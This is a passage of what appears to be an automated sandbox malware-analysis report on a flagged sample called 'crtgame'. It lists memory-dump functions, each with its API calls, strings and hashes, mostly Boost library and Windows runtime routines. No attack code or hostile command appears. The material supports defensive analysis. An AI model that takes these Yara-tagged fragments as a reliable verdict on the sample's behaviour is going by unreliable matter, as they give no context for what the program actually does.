                                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                            • String ID:
                                                                                            • API String ID: 2456309408-0
                                                                                            • Opcode ID: 7ec55bfe7cb041f25ba5b150ea3f1eb7db583d2451ff73202236ce19a8067570
                                                                                            • Instruction ID: 14bd98d7542f06fc4466807934e7a1a890d623702c0b28078402235947fda648
                                                                                            • Opcode Fuzzy Hash: 7ec55bfe7cb041f25ba5b150ea3f1eb7db583d2451ff73202236ce19a8067570
                                                                                            • Instruction Fuzzy Hash: 7C018671840724DBCB36AF54E908B9ABBF9EF08309F00491DF84692590CF70A949CF54
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$H_prologSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1765829285-0
                                                                                            • Opcode ID: cbaa399b07edde95a4649c696ca54a0870d1796af3031d66859e2b0832fe358f
                                                                                            • Instruction ID: fa171e15caf58a7b39d2e6dc6fabbc3a4ed144a3a2f5339aa0590463c2006aeb
                                                                                            • Opcode Fuzzy Hash: cbaa399b07edde95a4649c696ca54a0870d1796af3031d66859e2b0832fe358f
                                                                                            • Instruction Fuzzy Hash: B1F05436A40220EFCB009F94D8C8B89BBB5FF0D312F0081A9F919EB290CB359854CB51
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02A37D5C,?,?,00000000), ref: 02A39059
                                                                                            • getsockname.WS2_32(?,?,?), ref: 02A3906F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastgetsockname
                                                                                            • String ID: &'
                                                                                            • API String ID: 566540725-655172784
                                                                                            • Opcode ID: 10428e02a8d6459e66a9134a2243211fc4e864c165e2ecf7c46bfca971f42146
                                                                                            • Instruction ID: 3b3936b8895e59a64f543a38c0d5453e6d17000b54c89b56f74b223b78a9304a
                                                                                            • Opcode Fuzzy Hash: 10428e02a8d6459e66a9134a2243211fc4e864c165e2ecf7c46bfca971f42146
                                                                                            • Instruction Fuzzy Hash: 52217F72A002099BDB10DF68D944A9FB7F5FF48310F10856AE919EB280EB70E9458B91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3C63D
                                                                                              • Part of subcall function 02A3CC19: std::exception::exception.LIBCMT ref: 02A3CC48
                                                                                              • Part of subcall function 02A3D3D2: __EH_prolog.LIBCMT ref: 02A3D3D7
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A3CC78: __EH_prolog.LIBCMT ref: 02A3CC7D
                                                                                            Strings
                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A3C67A
                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02A3C673
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                            • API String ID: 1953324306-1943798000
                                                                                            • Opcode ID: c454fa58832879a486068a36fe807fafff3ce5df5e074913b791137f9764c33d
                                                                                            • Instruction ID: 22beb5d6810bcc525f941370df765a20b3deb5e9549e484d76d107201fbd7c55
                                                                                            • Opcode Fuzzy Hash: c454fa58832879a486068a36fe807fafff3ce5df5e074913b791137f9764c33d
                                                                                            • Instruction Fuzzy Hash: D0218071D40258EADB05EFA8DA54AAEBBB6EF54714F00049EF906B7240DF709A04CF91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3C732
                                                                                              • Part of subcall function 02A3CCF0: std::exception::exception.LIBCMT ref: 02A3CD1D
                                                                                              • Part of subcall function 02A3D509: __EH_prolog.LIBCMT ref: 02A3D50E
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A3CD4D: __EH_prolog.LIBCMT ref: 02A3CD52
                                                                                            Strings
                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02A3C768
                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A3C76F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                            • API String ID: 1953324306-412195191
                                                                                            • Opcode ID: 97540a882d80797711c05a73f1301b259b6779741272665fc8d40cec0427d777
                                                                                            • Instruction ID: 32584ae9484eec9879d5389d1dbc8f4c4bbf833cac009596f40f6afe1d2937b4
                                                                                            • Opcode Fuzzy Hash: 97540a882d80797711c05a73f1301b259b6779741272665fc8d40cec0427d777
                                                                                            • Instruction Fuzzy Hash: 3A218071E40214DADB05EFE8DA58BAEBBB5EF54708F00045EFC05A7240DF749A05CB91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A35288
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02A375B2), ref: 02A3529A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                            • String ID: \save.dat
                                                                                            • API String ID: 4128168839-3580179773
                                                                                            • Opcode ID: 3057f8bcc0ba440c36c5e1347e74a2938706b53b4e36e66bd5b705bcb5368f00
                                                                                            • Instruction ID: 0a60802e70c8963190b95358b0270f099bdb809aeb7454f8db20eee62b5fbb1e
                                                                                            • Opcode Fuzzy Hash: 3057f8bcc0ba440c36c5e1347e74a2938706b53b4e36e66bd5b705bcb5368f00
                                                                                            • Instruction Fuzzy Hash: 23115E32D0431027DB229F698C809AFFF67EFC665475401E9F84467102DE625D05C5A0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3396A
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A339C1
                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                              • Part of subcall function 02A39FA7: __EH_prolog.LIBCMT ref: 02A39FAC
                                                                                              • Part of subcall function 02A39FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A39FBB
                                                                                              • Part of subcall function 02A39FA7: __CxxThrowException@8.LIBCMT ref: 02A39FDA
                                                                                            Strings
                                                                                            • Day of month is not valid for year, xrefs: 02A339AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Day of month is not valid for year
                                                                                            • API String ID: 1404951899-1521898139
                                                                                            • Opcode ID: 68809e8fe6786ddb3a102c9abb3e5638c9dfe369c68f72ee80ee3ec70afc7d79
                                                                                            • Instruction ID: 96011fcad3f738d621385da9944f89a893fb110da6863562ad95c39c20ba16dc
                                                                                            • Opcode Fuzzy Hash: 68809e8fe6786ddb3a102c9abb3e5638c9dfe369c68f72ee80ee3ec70afc7d79
                                                                                            • Instruction Fuzzy Hash: 29019E7695420AAADF01EFA4D901AEFB7B9FF18710F00401AFC04A3200EF704A45CB95
                                                                                            APIs
                                                                                            • std::exception::exception.LIBCMT ref: 02A3F510
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02A3F525
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 4063778783-2104205924
                                                                                            • Opcode ID: 29dd18d3b75761cfb13a7de7d49f1c1849fa46ed14c2a7a6ad6573499252f556
                                                                                            • Instruction ID: 2f56e5d82dca7ab24b4f29316e1ed3816ad82f2f42010381fb0776a1b98c3e95
                                                                                            • Opcode Fuzzy Hash: 29dd18d3b75761cfb13a7de7d49f1c1849fa46ed14c2a7a6ad6573499252f556
                                                                                            • Instruction Fuzzy Hash: E8F02771A8031E7B9F09ABA88A559BF73FCAB00720B5005AAF816D2181EF70E6408980
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33C1B
                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02A33C30
                                                                                              • Part of subcall function 02A41EB7: std::exception::exception.LIBCMT ref: 02A41EC1
                                                                                              • Part of subcall function 02A39FE0: __EH_prolog.LIBCMT ref: 02A39FE5
                                                                                              • Part of subcall function 02A39FE0: __CxxThrowException@8.LIBCMT ref: 02A3A00E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                            • String ID: bad cast
                                                                                            • API String ID: 1300498068-3145022300
                                                                                            • Opcode ID: 571c9080989a6c37df5b02bdcdc39d1679d5ae0b65c159b6ec3ae886aad84c84
                                                                                            • Instruction ID: 4676cacb4411800f4dd28f988c3b43670965911610aace728a914e2773c39748
                                                                                            • Opcode Fuzzy Hash: 571c9080989a6c37df5b02bdcdc39d1679d5ae0b65c159b6ec3ae886aad84c84
                                                                                            • Instruction Fuzzy Hash: EAF0EC32D005049BCB0ADF08D440AEBB776EF52311F0000AAFC068B240CFB28A8ACA90
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33886
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A338A5
                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                            Strings
                                                                                            • Day of month value is out of range 1..31, xrefs: 02A33894
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Day of month value is out of range 1..31
                                                                                            • API String ID: 2067857976-1361117730
                                                                                            • Opcode ID: 9117fc2ae4a815bb646c0f0a5ebd2b74c32f02930ab693a1e5cdde57010e1972
                                                                                            • Instruction ID: fb4722d4787c515afa300f9b83b6d9372d5a7cbe034d23e2ce54ab61276428aa
                                                                                            • Opcode Fuzzy Hash: 9117fc2ae4a815bb646c0f0a5ebd2b74c32f02930ab693a1e5cdde57010e1972
                                                                                            • Instruction Fuzzy Hash: 69E0D8B2E80224ABD715FF9489117DEB775EF08720F00049AFC0173280DFB51984CB90
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A338D2
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A338F1
                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                            Strings
                                                                                            • Year is out of valid range: 1400..10000, xrefs: 02A338E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                                            • API String ID: 2067857976-2344417016
                                                                                            • Opcode ID: 69b68c0230abaff479e7a567b71f2a169fe9933376dd139222820093425b0bef
                                                                                            • Instruction ID: efe47d7fd016f637b99099356d39e5f3bfd3316aa1c55978dfb89309ddbcec5b
                                                                                            • Opcode Fuzzy Hash: 69b68c0230abaff479e7a567b71f2a169fe9933376dd139222820093425b0bef
                                                                                            • Instruction Fuzzy Hash: 1DE092B2A802246BD715EB9889117DEB775EF08710F00009AFC0167680DFB51944CB91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3391E
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A3393D
                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                            Strings
                                                                                            • Month number is out of range 1..12, xrefs: 02A3392C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Month number is out of range 1..12
                                                                                            • API String ID: 2067857976-4198407886
                                                                                            • Opcode ID: 596e86758b70cf11acae967fb6fb89fb9c361957f2f14e5870ea4a90709db3ac
                                                                                            • Instruction ID: a94be7b637f4a8cf5514e899b29fee19eaa077ede23779c316866b711680346d
                                                                                            • Opcode Fuzzy Hash: 596e86758b70cf11acae967fb6fb89fb9c361957f2f14e5870ea4a90709db3ac
                                                                                            • Instruction Fuzzy Hash: C7E0D8B2E802246BE715FF9489117DFB775EF08710F00009AFC0163280DFB51984CB91
                                                                                            APIs
                                                                                            • TlsAlloc.KERNEL32 ref: 02A319CC
                                                                                            • GetLastError.KERNEL32 ref: 02A319D9
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocErrorH_prologLast
                                                                                            • String ID: tss
                                                                                            • API String ID: 249634027-1638339373
                                                                                            • Opcode ID: 4606aec9070e3b69327255ef82d8595e99b04575d30b4c6c04215353431dd271
                                                                                            • Instruction ID: baf5c6cd528921e0513deefad78740fb593aec9ad1955cbe2e7007410944f5f3
                                                                                            • Opcode Fuzzy Hash: 4606aec9070e3b69327255ef82d8595e99b04575d30b4c6c04215353431dd271
                                                                                            • Instruction Fuzzy Hash: 5DE08C32D443245BC2007B78AC0808BBBE49A84335F108B6AFDAE972D0FF30C9558BC6
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33BD8
                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02A33BED
                                                                                              • Part of subcall function 02A41EB7: std::exception::exception.LIBCMT ref: 02A41EC1
                                                                                              • Part of subcall function 02A39FE0: __EH_prolog.LIBCMT ref: 02A39FE5
                                                                                              • Part of subcall function 02A39FE0: __CxxThrowException@8.LIBCMT ref: 02A3A00E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                            • String ID: bad cast
                                                                                            • API String ID: 1300498068-3145022300
                                                                                            • Opcode ID: 11ae6335e6a6753ec99ed1ea19a2b62feaeef3a053e2171f27e5f1134118cf2e
                                                                                            • Instruction ID: 75af33dc7ffd9c77c39ebe288260ae8946b00dd1b08dc9b98e11a0e8e1142efc
                                                                                            • Opcode Fuzzy Hash: 11ae6335e6a6753ec99ed1ea19a2b62feaeef3a053e2171f27e5f1134118cf2e
                                                                                            • Instruction Fuzzy Hash: 7FE0DF71D40109EBC715EF54D241BBEB771EF14304F0040ADAC0647690CF304A86CF81